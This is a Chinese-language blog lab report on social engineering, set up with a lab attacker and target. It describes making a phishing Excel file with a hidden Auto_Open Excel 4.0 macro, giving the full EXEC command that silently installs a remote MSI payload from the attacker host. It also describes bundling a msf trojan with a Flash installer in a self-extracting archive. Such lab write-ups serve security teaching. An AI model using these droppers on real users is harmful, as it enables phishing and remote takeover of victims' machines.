社会工程学

最新推荐文章于 2024-09-24 13:04:20 发布
最新推荐文章于 2024-09-24 13:04:20 发布
阅读量412 收藏 4
点赞数 3
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79278437/article/details/141729295
版权

一、实验目的

学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。

二、实验任务

1、制作恶意的excel文件

2、将正常的软件和恶意木马进行捆绑打包

三、实验环境

1、靶机地址:192.168.137.132

2、攻击机地址:192.168.137.128

四、实验过程和实验结果

(一)excel宏

1.msf生成恶意的msi文件

  1. msf建立监听

  1. python在具有恶意的msi的文件夹下开启http服务

  1. 开始制作excel

改一个更加容易让受害者相信的文件名,并加一些内容蒙混

  1. 插入宏

选择插入宏表

第一行输入

=EXEC("msiexec /q /i http://192.168.32.128/diaoyu.msi")

表示调用服务器上的msi

第二行输入

=HALT()

标识Excel 4.0宏结束

在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车

然后隐藏宏,并另存为启用宏的工作表

保存后拖到windows7的虚拟机,运行然后启用宏

成功上线

  • 常规软件捆绑远控木马进行钓鱼

制作msf木马

将制作的木马程序和flash安装包用winrar压缩在一起,并设置解压后运行这两个文件

打开监听

将压缩文件拖到win7中

点击安装,成功上线

五、实验总结

通过本次实验,我学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。

实验过程中遇到的问题:恶意excel文件多次尝试不能上线,通过多次重新制作excel文件、仔细核对文件左上角的木马并多次尝试解决;正常文件和恶意木马打包时要使用特定的压缩工具打包。

在日常工作、生活中要警惕社会工程的渗透,提高信息安全意识。

Kay_zt
关注
社会工程学介绍
简介
02-17 1289
目录前言手段和术语假托在线聊天/电话钓鱼下饵(Baiting)等价交换同情心尾随(Tailgating or Piggybacking)社交工程学的演进钓鱼式攻击电脑蠕虫垃圾邮件特别人物 前言 在信息安全方面,社会工程学是指对人进行心理操纵术,使其采取行动或泄露机密信息。这与社会科学中的社会工程不同,后者不涉及泄露机密信息的问题。它是一种以信息收集、欺诈或系统访问为目的的信任骗局,与传统的 "骗局 "不同,它通常是更复杂的欺诈计划中的许多步骤之一。在英美普通法系,这一行为一般是被认作侵犯隐私权的。 历史上,
Kali渗透测试:社会工程学工具
Liu_Bruce的博客
05-18 4845
Kali渗透测试:社会工程学工具 人是网络安全中一个远比设备和程序更重要的因素。在网络安全中,社会工程学所攻击的目标 就是人。在现实中,往往人的一点疏忽就导致了网络中的所有防御手段形同虚设。 1.1 社会工程学的概念 社会工程学是一个通过研究受害者心理,并以此诱使受害者做出配合,从而达到自身目的的学科。黑客米特尼克(Mitnick)在他的作品《反欺骗的艺术》中第一次提到社会工程学,他认为长期以来在网络安全领域中,社会工程学指的就是利用受害者的心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱的手段,一些犯罪分
社会工程学工具
2303_76983620的博客
06-06 1064
社会工程学的概念社会工程学是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗等危害手段取得自身利益的手法,是通过研究受害者心理,并以此诱使受害者做出配合,从而达到自身目的的方法。其实我一直觉得社会工程学和中国古代的“干术”十分类似者都是“欺骗的艺术”。历史上最著名的黑客米特尼克在他的作品《反欺骗的艺术》中第一次提到社会工程学,长期以来在网络安全领域中,社会工程学指的就是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗等危害手段取得自身利益的手法。
社会工程学攻击与防范
2401_84466225的博客
06-17 1507
通过利用人们的心理弱点、本能反应、好奇心、信任、贪婪等一些心理陷阱进行的诸如欺骗、伤害、信息盗取、利益谋取等对社会及人类带来危害的行为或方法。当网络恶意攻击者无法通过纯粹的计算机技术达到目的时,高超的情商将取代智商成为进一步打开突破口的武器,研究这些恶意攻击的安全人员也将跟进这些特殊而神秘的手段,从而在长期内形成安全领域独树一帜的理论。
什么是社会工程学
南北极之间
07-06 3945
社会工程是指利用人类互动和情感操纵目标的各种攻击。在攻击过程中,受害者被愚弄,泄露敏感信息或损害安全性。社会工程攻击通常需要多个步骤。攻击者将研究潜在的受害者,收集有关他们的信息以及他们如何使用它们来绕过安全协议或获取信息。然后,攻击者会执行一些操作来获取目标的信任,然后最终操纵他们泄露敏感信息或违反安全策略。​ 在社会工程学的这个定义中,社会工程学攻击始于攻击者弄清楚他们希望从组织或个人那里得到什么。然后,他们研究人类目标的行为或好恶,以找出如何最好地利用它们。然后,黑客将执行攻击,试图访问敏感数据或受保
渗透测试-社会工程学攻击
CSDN6047_的博客
04-19 2088
本次实验简单介绍了社会工程学、用户名和密码窃取与自动播放文件攻击的方法。
社会工程学攻击
Libra_Ng
10-24 5009
社会工程学定义 社会工程学攻击形式 收集敏感性息 根据搜索引擎对目标信息收集整理 根据微博信息或其他社交网络信息收集整理 根据踩点或调查所得到信息 根据网络钓鱼方式得到信息 根据目标信息管理缺陷得到信息 用户信息收集:GoogleHacking,Whois,指纹识别 网络钓鱼攻击(Phishing) 攻击者利用欺骗性的电子邮件和伪造的Web站点来进行网络诈骗活动,受骗者往往会泄露自己的...
网络安全】社会工程学攻击与防范
爱玩游戏的黑客的博客
05-24 1220
通过利用人们的心理弱点、本能反应、好奇心、信任、贪婪等一些心理陷阱进行的诸如欺骗、伤害、信息盗取、利益谋取等对社会及人类带来危害的行为或方法。当网络恶意攻击者无法通过纯粹的计算机技术达到目的时,高超的情商将取代智商成为进一步打开突破口的武器,研究这些恶意攻击的安全人员也将跟进这些特殊而神秘的手段,从而在长期内形成安全领域独树一帜的理论。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
网络安全—社会工程学
m0_63715896的博客
12-27 2759
一.社会工程学 声明:本人坚决反对利用社会工程学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。 1.什么是社会工程学? 世界第一黑客凯文·米特尼克在《欺骗的艺术》中曾提到,人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把
社会工程学攻击的实例化.pdf
08-07
” ----------摘自推特上的热门段子 社会工程学攻击伴随着APT攻击的持续走热,也变成了安全圈的热门词汇,而社会工程学个人认为并不是一门技术,大众所看到的玄之又玄的各种案例与奇技淫巧几乎是无法复制或者套用的...
社会工程学字典生成器——社工字典生成器
12-26
亦思想社会工程学字典生成器,可放心使用。
社会工程学入侵.zip
01-19
社会工程学,作为一种独特而巧妙的信息安全攻防手段,它主要依赖于人的自然倾向和心理弱点,而非纯粹的技术手段。社会工程学的核心在于理解和利用人类的行为模式,通过沟通技巧、欺诈策略以及信息收集来获取敏感信息...
网络安全防护之社会工程学防范经验分享
08-26
社会工程学防范经验分享在网络安全防护中的重要性 社会工程学防范是网络安全防护中不可忽视的一部分。随着互联网的普及和社交媒体的兴起,各种社交类工具和软件的使用日益普遍化,带来了许多安全隐患。社会工程学...
个人计算机与网络的安全
最新发布
nn_84的博客
09-24 299
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
【计算机网络 - 基础问题】每日 3 题(二十一)
Newin2020的博客
09-24 673
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 997
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
【在Linux世界中追寻伟大的One Piece】验证TCP
weixin_74809706的博客
09-22 1698
成功调用该函数后,Winsock库的状态会被初始化,应用程序就可以使用Winsock提供的一系列套接字服务,如地址家族识别、地址转换、名字查询和连接控制等。在调用WSAStartup函数后,如果应用程序完成了对请求的Socket库的使用,应调用WSACleanup函数来解除与Socket库的绑定并释放所占用的系统资源。这样,编译器就能够识别并理解Winsock2中定义的数据类型和函数,从而能够正确地编译和链接网络相关的代码。接受客户端的连接请求,并返回一个新的套接字描述符,用于与客户端进行通信。
BGP相关知识笔记
Richardlygo的博客
09-23 1244
整个网络规模扩大,路由数量进一步增加,路由表与LSDB规模变大,路由收敛变慢,设备性能消耗加大为此在AS之间专门使用BGP协议进行路由传递,相较于传统的IGP路由协议:BGP基于TCP,只要能够建立TCP连接即可建立BGP只传递路由信息,不会暴露AS内的拓扑3。
揭秘社会工程学攻击:防范策略与实战案例
社会工程学攻击与防范是信息安全领域中的关键议题,它指的是攻击者利用人类的心理和社交技巧来欺骗或误导目标,从而获取未经授权的敏感信息或控制系统。这种攻击方式在攻击者无法通过传统技术手段直接入侵时尤为有效...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值